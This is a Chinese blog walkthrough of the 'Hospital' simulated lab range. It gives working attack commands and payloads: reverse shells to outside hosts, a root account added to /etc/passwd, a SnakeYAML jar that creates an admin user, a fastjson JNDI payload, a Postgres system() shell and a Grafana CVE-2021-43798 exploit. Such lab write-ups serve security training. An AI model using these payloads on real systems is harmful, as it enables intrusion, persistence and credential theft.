banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

春秋雲鏡仿真靶場Hospital實操

[[仿真靶场 - 醫院]]#

概述#

在這個場景中,你將扮演一名滲透測試工程師,被派遣去測試某家醫院的網絡安全性。你的目標是成功獲取所有伺服器的權限,以評估公司的網絡安全狀況。該靶場共有 4 個 flag,分布於不同的靶機。

image

靶場架構

image

信息收集#

fscan 掃描得到如下內容:

image

8080 端口存在一個網站和 heapdump 文件,訪問 /actuator 目錄

http://39.99.225.90:8080/actuator

image

訪問網站,弱口令登錄後台

image

漏洞利用#

登錄後台檢測到 shiro

image

無法爆破到 key,之前的 heampdump 文件中有 key

image

algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

爆破鏈

image

執行命令

image

生成內存馬,蟻劍連接

image

提權#

查找設置了 SUID 權限的文件,vim.basic 可以直接以 root 身份進行文件編輯

image

從蟻劍反彈 shell 到雲伺服器上

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'

需要升級交互式終端。

python3 -c "import pty;pty.spawn('/bin/bash')"

script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm-256color

通過 vim.basic 修改 /etc/passwd 進行提權

openssl passwd -1 -salt 123 123456

生成密碼

在 /etc/passwd 文件中添加個賬戶

hacker:$1$123$7mft0jKnzzvAdU4t0unTG1:0:0:/root:/bin/bash

flag01#

添加之後,su 切換到新添加的帳號,這台伺服器是 web01,獲取 flag01 的值

su hacker

image

參考:https://cloud.tencent.com/developer/article/1711865

內網掃描#

上 fscan 進行掃描

172.30.12.236:8080 open
172.30.12.5:8080 open
172.30.12.6:445 open
172.30.12.6:139 open
172.30.12.6:135 open
172.30.12.236:22 open
172.30.12.5:22 open
172.30.12.236:8009 open
172.30.12.6:8848 open
[*] NetInfo 
[*]172.30.12.6
   [->]Server02
   [->]172.30.12.6
[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[*] WebTitle http://172.30.12.5:8080   code:302 len:0      title:None 跳轉url: http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34
[*] WebTitle http://172.30.12.5:8080/login;jsessionid=AA88B536A2B3199D4BB9686F35367F34 code:200 len:2005   title:醫療管理後台
[*] WebTitle http://172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 – Not Found
[*] WebTitle http://172.30.12.236:8080 code:200 len:3964   title:醫院後台管理平台
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos 
[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass 
[+] PocScan http://172.30.12.5:8080 poc-yaml-spring-actuator-heapdump-file 

發現如下兩個資產

http://172.30.12.6:8848 poc-yaml-alibaba-nacos poc-yaml-alibaba-nacos-v1-auth-bypass 
http://172.30.12.236:8080 code:200 len:3964   title:醫院後台管理平台

內網 172.30.12.6 存在一台 nacos 服務,存在默認密碼 nacos/nacos
http://172.30.12.236:8080是存在 fastjson 服務


flag02#

利用venom代理內網,admin 監聽端口,agent 發起連接:

./admin_macos_x64 -lport 9999
./agent_linux_x64 -rhost x.x.x.x(vps ip) -rport 9999

訪問 nacos 應用

http://172.30.12.6:8848/nacos/

image

讀配置文件

image

datasource:

mysql:

url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true

username: root

password: P@ssWord!!!

在 db-config 的回滾配置文件中,可以看到惡意配置的 jar 包,內容差不多如下,一開始以為是要回滾到下述配置,後面重置了好幾次環境,測試後發現不用回滾,下述是手動配置文件

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://172.30.12.5:802/yaml-payload.jar"]
  ]]
]

利用工具進行利用

需要編譯惡意 payload,參考項目:https://github.com/artsploit/yaml-payload

只需要修改 AwesomeScriptEngineFactory.java 的內容,由於目標是 windows 機器,所以可以添加個帳號,目標伺服器也開了 3389 端口

public AwesomeScriptEngineFactory() {
	try {
		Runtime.getRuntime().exec("net user lca Lca@123 /add");
		Runtime.getRuntime().exec("net localgroup administrators lca /add");
	} catch (IOException e) {
		e.printStackTrace();
	}
}

然後用java1.8 的版本去編譯,一定要用 java1.8 編譯

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

上傳至 web01 伺服器(flag01 那台),web01 上開啟 python 服務,讓 web02(172.30.12.6)來下載惡意 jar 包,然後用工具 NacosExploitGUI_v3.9 發送請求,jar 路徑就是 python 啟動的 web 服務的路徑

java -jar NacosExploitGUI_v3.9.jar

image

web01 接受到請求,說明 172.30.12.6 已下載了惡意 payload,接下來就是驗證帳戶是否添加成功

image

在本地電腦上 proxifier 設置代理,連接 3389

image

image

連接成功,拿到 flag02,這台伺服器是 web02

image

nacos 相關漏洞:

Nacos 內網集群 Raft 反序列化漏洞
Nacos JRaft Hessian 反序列化漏洞利用工具


flag03#

另外一台存在 fastjson 漏洞

image

不出網打,在 172.30.12.5(web01)上啟動JNDI

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:1389/badNameClass",
        "autoCommit":true
    }
}

yakit 上需要開啟下級代理

image

獲取 flag03,這台是 web03 機器


flag04#

本地電腦要訪問最後一台機器,需要二層內網代理,這台機器上有grafana+postgres兩個服務,grafana 存在弱口令,可直接登錄後台。

grafana 後台可執行 postgres 的命令,反彈一個低權限的 shell 到 web03 伺服器上

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;

select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

在 web3 上,下載https://github.com/A-D-Team/grafanaExp,利用上述 exp (**CVE-2021-43798**) 讀取帳號密碼,然後登錄 postgres 賬戶

./grafanaExp exp -u http://172.30.54.12.:3000/

讀取到帳號密碼 postgres@123,通過 psql 登錄

psql -h 172.30.54.12 -U postgres -W

postgres=# select version();

#查看管理員的密碼是md5格式
postgres=# SHOW is_superuser;

使用 hashcat 進行破解,數據庫 root 的密碼為 P@ssw0rd123

hashcat -w 4 -m 0 -a 0 hashfile.txt /usr/share/wordlists/rockyou.txt -O

然後用 root 用戶登錄提權,psql 用絕對路徑

sudo /usr/local/postgresql/bin/psql

輸入\?跳轉到命令行,找到 flag04

image

參考#

https://h0ny.github.io/posts/Hospital-%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/#grafana-unauthorized-arbitrary-file-reading-cve-2021-43798

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。